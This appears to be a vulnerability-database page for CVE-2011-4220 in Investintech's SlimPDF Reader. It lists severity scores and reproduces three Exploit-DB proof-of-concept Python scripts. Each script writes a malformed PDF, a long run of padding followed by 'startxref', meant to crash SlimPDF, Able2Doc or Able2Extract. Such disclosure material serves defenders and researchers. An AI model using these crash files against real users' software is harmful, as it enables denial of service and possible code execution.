CVE-2011-4220
published 2011-11-01CVE-2011-4220: Investintech.com SlimPDF Reader does not properly restrict the arguments to unspecified function calls, which allows remote attackers to cause a denial of…
PriorityP349critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.38%
93.6th percentile
Investintech.com SlimPDF Reader does not properly restrict the arguments to unspecified function calls, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
exploitdb·2012-06-25
CVE-2011-4222 Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
---
# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4221
payload ="B"*13000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
Exploit-DB
Able2Extract and Able2Extract Server 6.0 - Memory Corruption
exploitdb·2012-06-25
CVE-2011-4222 Able2Extract and Able2Extract Server 6.0 - Memory Corruption
Able2Extract and Able2Extract Server 6.0 - Memory Corruption
---
# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222
payload ="A"*12000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
Exploit-DB
Slimpdf Reader 1.0 - Memory Corruption
exploitdb·2012-06-25
CVE-2011-4222 Slimpdf Reader 1.0 - Memory Corruption
Slimpdf Reader 1.0 - Memory Corruption
---
# Exploit Title:
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:1.0
# Tested on: Windows 7
# CVE : cve-2011-4220
payload ="A"*10000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
No writeups or analysis indexed.
2011-11-01
Published